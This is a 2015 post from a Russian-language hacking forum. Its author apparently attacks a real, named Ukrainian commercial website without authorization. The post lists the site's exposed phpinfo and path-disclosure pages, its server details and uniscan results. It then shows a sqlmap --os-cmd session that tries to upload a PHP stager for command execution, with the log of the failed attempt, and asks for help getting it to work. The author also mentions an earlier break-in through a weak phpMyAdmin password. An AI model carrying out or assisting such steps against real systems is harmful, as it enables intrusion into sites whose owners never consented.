HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 17.10.2015, 16:45
aldemko
Guest
Сообщений: n/a
Провел на форуме:
12627

Репутация: 0
По умолчанию
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан

Я начал искать новые ресурсы для обучения и практики

и так ресурс:

http://www.aza.com.ua

phpinfdo http://www.aza.com.ua/info.php

страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html

немного о сервере

web server operating system: Windows

web application technology: Apache 2.2.21, PHP 5.2.17

back-end DBMS: MySQL 5.0

current user: 'root@localhost'

current database: 'test'

current user is DBA: True

uniscan по ключу --qwe

показывает (если я правильно понял) папки с правами на запись

| Directory check:

| [+] CODE: 200 URL: http://www.aza.com.ua/banner/

| [+] CODE: 200 URL: http://www.aza.com.ua/cart/

| [+] CODE: 200 URL: http://www.aza.com.ua/conf/

| [+] CODE: 200 URL: http://www.aza.com.ua/doc/

| [+] CODE: 200 URL: http://www.aza.com.ua/email/

| [+] CODE: 200 URL: http://www.aza.com.ua/edit/

| [+] CODE: 200 URL: http://www.aza.com.ua/images/

| [+] CODE: 200 URL: http://www.aza.com.ua/img/

| [+] CODE: 200 URL: http://www.aza.com.ua/japan/

| [+] CODE: 200 URL: http://www.aza.com.ua/news/

| [+] CODE: 200 URL: http://www.aza.com.ua/orders/

| [+] CODE: 200 URL: http://www.aza.com.ua/pma/

| [+] CODE: 200 URL: http://www.aza.com.ua/quest/

| [+] CODE: 200 URL: http://www.aza.com.ua/user/

затем используя sqlmap-u сайт --os-cmd –v l

выбираю 4 (php)

затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:

Код:
Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?

Проблема в пути который указываю в sqlmap

или в том что статус 200 в uniscan Не имеет в виду что права на запись есть

или еще что то ?

спасибо
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ